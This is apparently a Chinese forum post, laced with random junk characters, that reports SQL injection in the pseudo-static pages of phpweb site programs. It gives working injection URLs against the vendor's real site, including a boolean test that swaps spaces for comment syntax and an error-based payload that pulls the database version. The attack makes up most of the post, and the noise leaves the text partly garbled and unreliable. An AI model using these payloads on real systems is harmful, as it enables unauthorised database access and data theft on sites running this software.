phpweb所有的整站程序伪静态页面都存在sql注入3 U" f# L `) O/ Y/ s6 y. s
, u: y9 N5 v) u1 V, T" {: `# X主站:http://phpweb.net/
; J7 n; U6 E7 n* K: N加’检测:0 i `6 y( f) d. s: n! @! y
/ m6 F3 V @2 |http://www.phpweb.net/down/html/?772′.html% m: V# k1 `% l# k* R5 m4 m# [
3 `' W! D+ B. H! U. G出错
: y m8 D' W, q6 C. B存在注入。
6 v _ m0 w! o- k9 J不能用空格,只能用/*罗
5 x. m- j4 T whttp://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常
# V5 ^' Z Z* n) o2 X 6 r2 }4 H n$ u1 V/ O. o8 Z) u
http://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.
/ G$ r* J; M6 f; j3 w1 Z/ G9 o爆数据库版本:( }! I0 ~. l' p2 k( v& [5 ?
8 k( F2 _& ^* D, H?) D) h& Z# P( O2 Z( n
1
3 e2 b$ X8 f! U% c. t! n1 Q9 C9 b4 \http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html
# A$ h L* _& A1 t9 I; O1 ^更新日期: 2013-01-03 13:39:50 $ k' k H8 ]% i: `1 |3 A
|
发表于 2013-1-4 19:46:42
收藏
支持
反对